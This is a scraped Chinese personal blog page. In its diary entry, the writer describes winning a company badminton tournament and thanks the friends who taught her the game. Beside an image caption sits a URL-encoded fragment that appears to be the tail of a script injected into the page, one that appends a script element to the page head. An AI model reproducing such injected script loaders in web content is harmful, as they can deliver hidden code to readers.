登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

心灵的风景

在平实的生活里体会尘世的幽深邃远。在五彩缤纷的有形世界中,领略心灵深处的万千风景

 
 
 

日志

 
 
关于我

一心追求财富渐渐失去健康,一心追求美丽奈何不了时光,一心追求爱情容易变得感伤.一心追求名望,心眼越长越长,搞不明白究竟是理想太难,还是幸福太勉强!

日记一则:羽毛球比赛  

2010-10-28 14:45:02|  分类: 我的日记 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
日记一则:羽毛球比赛 - 盛如夏雨 - 心灵的风景

 

10月22日是一年一度的集团羽毛球比赛的日子。我是第三次参加这比赛,除了去年女双比赛获得亚军外,其他两次都是冠军。这让和我一起打球的球友们很是窝囊,因为我是这些人中打得最不好,球技最差的,但却常常拿奖。他们恨自己无用武之地,所以常常要我把奖品分给他们,是他们在陪我打球,我的技术是他们练出来的,无奈这次的奖品是高压锅,要掰好几半,所以没给他们了。

在这里要特别感谢董老师夫妇(虽然他们看不到我写的东西),是他们将我带到羽毛球的圈子里。在认识他们之前我没摸过拍子。是他们耐心的陪打、讲解,加之我喜欢运动,所以每周坚持打球。更妙的是我们通过打球认识了国家射击场的管理员,那里的羽毛球场地是运动员专用的,条件非常好,灯光、地板、空调是我见过的最好的场馆。每当节假日,我们便可以去他们那里打球,他们的技术堪称一绝,经常和他们比赛,旗鼓相当,叫人有种高山流水遇知音的快感。

日记一则:羽毛球比赛 - 盛如夏雨 - 心灵的风景cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">在我的影响下,同学、同事、朋友又有很多人加入到这个圈子里,只要想打球便很容易找到同伴。可是这么多年来,一直想把老公拉到我们的队伍中来,总是落败。我的下一步计划还是让老公也喜欢上这项运动,他实在太缺乏锻炼了。

感觉这日记写得就是流水账了,发两张比赛照片吧:

日记一则:羽毛球比赛 - 盛如夏雨 - 心灵的风景
 这是表演赛,我那动作真像是表演,一点也不似我平时的凌厉作风 。
日记一则:羽毛球比赛 - 盛如夏雨 - 心灵的风景
 高压锅实在是太大了,够十个人吃的。特别重,我这样的力量型主妇搬起来都有点困难,其他人可想而知日记一则:羽毛球比赛 - 盛如夏雨 - 心灵的风景
  评论这张
 
阅读(358)| 评论(5)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018